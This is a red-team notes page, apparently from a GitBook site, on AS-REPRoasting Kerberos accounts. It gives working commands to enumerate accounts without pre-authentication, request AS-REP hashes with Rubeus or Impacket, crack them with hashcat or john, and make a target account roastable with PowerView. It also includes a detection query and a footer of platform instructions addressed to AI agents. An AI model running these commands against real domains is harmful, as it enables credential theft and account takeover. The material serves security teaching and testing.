> For the complete documentation index, see [llms.txt](https://otter.gitbook.io/red-teaming/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://otter.gitbook.io/red-teaming/notes/kerberos/as-reproasting.md). # AS-REPRoasting If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password. This configuration is enabled on the User Object and is often seen on accounts that are associated with Linux systems. The technique requires the user's username to send a packet to the KDC. As we learned in while getting a [overview of the Kerberos Authentication process](/red-teaming/notes/kerberos/overview-of-kerberos-authentication.md), if an account has pre-authentication disabled, an attacker can obtain an encrypted TGT for the affected account without any prior authentication. If the password for the user is weak it's possible to crack the obtained hash and compromise the account as the authentication is only encrypted with the user's password. To enumerate for AS-REPRoasting we can use tools like ADSearch, Powerview and Impacket ``` ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname ``` ``` Import-Module .\PowerView.ps1 Get-DomainUser -UACFilter DONT_REQ_PREAUTH ``` ``` GetNPUsers.py domain.com/otter GetNPUsers.py DOMAIN/ -dc-ip 10.10.10.10 -usersfile users.txt -format haschat -outputfile hashes.txt -no-pass ``` To perform the attack we can use Impacket or Rubeus ``` .\Rubeus.exe asreproast /user:otter /domain:domain.com /dc:dc.domain.com /nowrap /outfile:hashes.txt ``` ``` GetNPUsers.py domain.com/otter -request GetUserSPNs.py -no-preauth otter -usersfile users.list -dc-host 10.10.10.10 domain.com/ ``` In order to crack the hash we can use `--format=krb5asrep --wordlist=wordlist squid_svc` for john or `-a 0 -m 18200 squid_svc wordlist` for hashcat. If we compromise an account with `GenericAll` permissions over another user, we can set the `DONT_REQ_PREAUTH` attribute to make the user susceptible to AS-REPRoasting - this is a more subtle option to changing the user's password directly but requires its password to be weak in order for us to crack the hash. ``` Import-Module .\PowerView.ps1 Set-DomainObject -Identity otter -XOR @{useraccountcontrol=4194304} -Verbose ``` {% hint style="danger" %} OPSEC ASREPRoasting with will generate a 4768 event with RC4 encryption and a preauth type of 0. ``` event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17 ``` {% endhint %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/kerberos/as-reproasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.